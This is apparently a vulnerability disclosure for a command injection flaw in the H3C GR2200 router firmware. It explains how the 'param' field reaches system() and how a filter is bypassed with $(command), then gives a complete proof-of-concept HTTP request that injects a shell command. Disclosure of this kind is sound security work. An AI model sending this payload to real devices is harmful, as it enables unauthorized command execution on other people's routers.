H3C GR2200 MiniGR1A0V100R014 Has an command injection vulnerability
Overview
- Manufacturer's website information:https://www.h3c.com/
- Firmware download address : https://www.h3c.com/cn/d_202202/1542099_30005_0.htm
Product Information
H3C GR2200 MiniGR1A0V100R014 router, the latest version of simulation overview:
Vulnerability details
H3C GR2200 (MiniGR1A0V100R014) was found to contain a command insertion vulnerability in DelL2tpLNSList.This vulnerability allows an attacker to execute arbitrary commands through the "param" parameter.
Format the param parameter we entered into V13 through the snprintf function, and execute our command through the system function. Because V8 and V9 are limited to 8 bytes, we can fill V8 with 8 bytes so that when %s in the snprintf function is formatted, V8 and V9 will be connected actively.
Although the sub_46EE30 function filters some dangerous characters, we can bypass them with $(command).
Recurring vulnerabilities and POC
In order to reproduce the vulnerability, the following steps can be followed:
- Boot the firmware by qemu-system or other ways (real machine)
- Attack with the following
POCattacks
POST /goform/aspForm HTTP/1.1
Host: 192.168.124.1:80
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://192.168.124.1:80/maintain_basic.asp
Cookie: JSESSIONID=04f803a0
Upgrade-Insecure-Requests: 1
Content-Length: 67
CMD=DelL2tpLNSList&GO=vpn_l2tp_session.asp¶m=1;$(ps>/ww w/1) #;
The picture above shows the debug log after POC is sent.
The above illustration shows the effect of command execution.




